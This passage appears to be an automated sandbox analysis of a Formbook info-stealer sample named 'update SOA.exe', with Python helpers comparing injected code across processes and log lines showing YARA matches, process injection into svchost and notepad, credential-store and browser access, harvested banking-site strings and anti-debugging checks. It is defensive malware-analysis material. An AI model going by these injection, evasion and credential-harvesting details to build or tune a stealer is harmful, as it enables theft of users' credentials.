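    """Most common (b - a) difference over API names seen in both processes.
    Returns (delta, names supporting it, names in common); full support means the
    same code is present in both, relocated by a constant."""
    common = set(a.apis) & set(b.apis)
    deltas = Counter(bb - aa for n in common for aa in a.apis[n] for bb in b.apis[n])
    if not deltas:
        return None, 0, 0
    delta = deltas.most_common(1)[0][0]
    support = sum(1 for n in common
                  if any(bb - aa == delta for aa in a.apis[n] for bb in b.apis[n]))
    return delta, support, len(common)


def string_funcs_agree(a, b, delta):
    """Fraction of a's string routines that b has at the same shifted address."""
    if not a.string_funcs:
        return 0.0
    return sum(addr + delta in b.string_funcs for addr in a.string_funcs) / len(a.string_funcs)
```

On the sampled rows, `relocation_delta(procs[2], procs[5])` returns 0x12A0000 with all nine common API names agreeing, and `string_funcs_agree` returns 1.0: the two string routines the report counts in svchost.exe (03AAEA12, 03A2B970) reappear in notepad.exe at exactly the shifted addresses (04D4EA12, 04CCB970), so the "potential string decryption" functions in both processes are the same code. The NtClose at 0042C753 inside the unpacked image at svchost.exe's 0x400000 base has no shifted twin and is correctly outranked by the mode. Both processes reference the full injection chain, which matches the injection signatures the report raises for them.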
            Source: update SOA.exe, 00000000.00000003.2070693180.000000000481D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs update SOA.exe
            Source: update SOA.exe, 00000000.00000003.2070210673.0000000003DF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs update SOA.exe
            Source: update SOA.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3882344624.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3883839683.0000000005350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2343330383.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3886044229.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2343906085.0000000006650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3883738653.0000000004A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2343594491.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3883798608.0000000004A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/5
            Source: C:\Users\user\Desktop\update SOA.exe | File created: C:\Users\user\AppData\Local\Temp\teer
            Source: update SOA.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\update SOA.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\update SOA.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002F1E000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3882543699.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3882543699.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2527421693.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: update SOA.exe | ReversingLabs: Detection: 42%
            Source: C:\Users\user\Desktop\update SOA.exe | File read: C:\Users\user\Desktop\update SOA.exe
            Source: unknown | Process created: C:\Users\user\Desktop\update SOA.exe "C:\Users\user\Desktop\update SOA.exe"
            Source: C:\Users\user\Desktop\update SOA.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\update SOA.exe"
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Process created: C:\Windows\SysWOW64\notepad.exe "C:\Windows\SysWOW64\notepad.exe"
            Source: C:\Windows\SysWOW64\notepad.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\notepad.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\update SOA.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\notepad.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: update SOA.exe | Static file information: File size 1401959 > 1048576
            Source: Binary string: notepad.pdbGCTL source: svchost.exe, 00000002.00000003.2312196681.0000000003443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2312112066.000000000341A000.00000004.00000020.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000002.3882959194.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: notepad.pdb source: svchost.exe, 00000002.00000003.2312196681.0000000003443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2312112066.000000000341A000.00000004.00000020.00020000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000004.00000002.3882959194.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HAdkDWMZRiGMZe.exe, 00000004.00000000.2266285714.00000000004CE000.00000002.00000001.01000000.00000005.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3882332650.00000000004CE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: update SOA.exe, 00000000.00000003.2070210673.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2071406574.0000000004890000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2070693180.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250582687.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252532945.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2349001032.0000000004AEC000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2347352548.0000000004935000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: update SOA.exe, 00000000.00000003.2070210673.0000000003CD0000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2071406574.0000000004890000.00000004.00001000.00020000.00000000.sdmp, update SOA.exe, 00000000.00000003.2070693180.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2250582687.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2252532945.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, notepad.exe, 00000005.00000003.2349001032.0000000004AEC000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004E3E000.00000040.00001000.00020000.00000000.sdmp, notepad.exe, 00000005.00000003.2347352548.0000000004935000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3884211097.0000000004CA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: notepad.exe, 00000005.00000002.3882543699.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3885110150.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2635917732.000000002370C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: notepad.exe, 00000005.00000002.3882543699.0000000002E77000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.3885110150.00000000052CC000.00000004.10000000.00040000.00000000.sdmp, HAdkDWMZRiGMZe.exe, 00000006.00000002.3884241981.00000000030BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2635917732.000000002370C000.00000004.80000000.00040000.00000000.sdmp
            Source: update SOA.exe | Static PE information: real checksum: 0xa2135 should be: 0x15a0bc
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041D0A4 push 0000000Dh; iretd | 2_2_0041D0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041491A push edx; ret | 2_2_00414954
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040AAEC push ecx; iretd | 2_2_0040AAED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413BE3 push eax; retf | 2_2_00413BE4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EBA0 push esp; iretd | 2_2_0041EBDC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EBA3 push esp; iretd | 2_2_0041EBDC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040ABA5 push edx; retf | 2_2_0040ABA9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403430 push eax; ret | 2_2_00403432
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D43B push es; retf | 2_2_0040D455
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401CE0 push ds; iretd | 2_2_00401DEB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004015DF push 00000028h; ret | 2_2_004015F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004085F8 push eax; ret | 2_2_00408602
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416643 pushfd ; iretd | 2_2_00416658
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A309AD push ecx; mov dword ptr [esp], ecx | 2_2_03A309B6
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Code function: 4_2_055AD115 push es; retf | 4_2_055AD12F
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Code function: 4_2_055B45F4 push edx; ret | 4_2_055B462E
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Code function: 4_2_055AA87F push edx; retf | 4_2_055AA883
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Code function: 4_2_055B38BD push eax; retf | 4_2_055B38BE
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Code function: 4_2_055B631D pushfd ; iretd | 4_2_055B6332
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe | Code function: 4_2_055A82D2 push eax; ret | 4_2_055A82DC
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_04CD09AD push ecx; mov dword ptr [esp], ecx | 5_2_04CD09B6
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02B93210 pushfd ; iretd | 5_2_02B93225
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02B851C5 push eax; ret | 5_2_02B851CF
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02B907B0 push eax; retf | 5_2_02B907B1
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02B9B770 push esp; iretd | 5_2_02B9B7A9
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02B87772 push edx; retf | 5_2_02B87776
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02B9B76D push esp; iretd | 5_2_02B9B7A9
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02B914E7 push edx; ret | 5_2_02B91521
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02BA0A1B push edi; retf | 5_2_02BA0A39
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02B9DA54 push esi; retf | 5_2_02B9DA5A
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02B9BF0D push esi; ret | 5_2_02B9BF10
            Source: C:\Windows\SysWOW64\notepad.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\update SOA.exe | API/Special instruction interceptor: Address: 42F668C
            Source: C:\Windows\SysWOW64\notepad.exe | API/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\notepad.exe | API/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\notepad.exe | API/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\notepad.exe | API/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\notepad.exe | API/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\notepad.exe | API/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\notepad.exe | API/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\notepad.exe | API/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03AAD1C0 rdtsc | 2_2_03AAD1C0
            Source: C:\Windows\SysWOW64\notepad.exe | Window / User API: threadDelayed 2124
            Source: C:\Windows\SysWOW64\notepad.exe | Window / User API: threadDelayed 7848
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\notepad.exe | API coverage: 3.3 %
            Source: C:\Windows\SysWOW64\notepad.exe TID: 7120 | Thread sleep count: 2124 > 30
            Source: C:\Windows\SysWOW64\notepad.exe TID: 7120 | Thread sleep time: -4248000s >= -30000s
            Source: C:\Windows\SysWOW64\notepad.exe TID: 7120 | Thread sleep count: 7848 > 30
            Source: C:\Windows\SysWOW64\notepad.exe TID: 7120 | Thread sleep time: -15696000s >= -30000s
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe TID: 5608 | Thread sleep time: -50000s >= -30000s
            Source: C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe TID: 5608 | Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\notepad.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\notepad.exe | Code function: 5_2_02B9C520 FindFirstFileW,FindNextFileW,FindClose, | 5_2_02B9C520
            Source: K4394f5.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: K4394f5.5.dr | Binary or memory string: discord.comVMware20,11696428655f
            Source: K4394f5.5.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: K4394f5.5.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: K4394f5.5.dr | Binary or memory string: global block list test formVMware20,11696428655
            Source: K4394f5.5.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: (1eractive Brokers - EU WestVMware20,11696428655n
            Source: K4394f5.5.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: K4394f5.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: K4394f5.5.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: K4394f5.5.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: K4394f5.5.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: K4394f5.5.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: K4394f5.5.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: K4394f5.5.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,116mT
            Source: K4394f5.5.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: firefox.exe, 00000009.00000002.2637250023.000002842364D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: K4394f5.5.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: K4394f5.5.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: K4394f5.5.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: K4394f5.5.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: notepad.exe, 00000005.00000002.3882543699.0000000002E77000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!(
            Source: K4394f5.5.dr | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: K4394f5.5.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: HAdkDWMZRiGMZe.exe, 00000006.00000002.3883082556.000000000111F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
            Source: K4394f5.5.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: K4394f5.5.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: K4394f5.5.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ebrokers.co.inVMware20,11696428655d
            Source: K4394f5.5.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: K4394f5.5.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: K4394f5.5.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: K4394f5.5.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: K4394f5.5.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: notepad.exe, 00000005.00000002.3887050160.0000000007D9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: eractive Brokers - EU WestVMware20,11696428655n
            Source: K4394f5.5.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: K4394f5.5.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\notepad.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417883 LdrLoadDll, | 2_2_00417883
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A533A5 mov eax, dword ptr fs:[00000030h] | 2_2_03A533A5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A633A0 mov eax, dword ptr fs:[00000030h] | 2_2_03A633A0
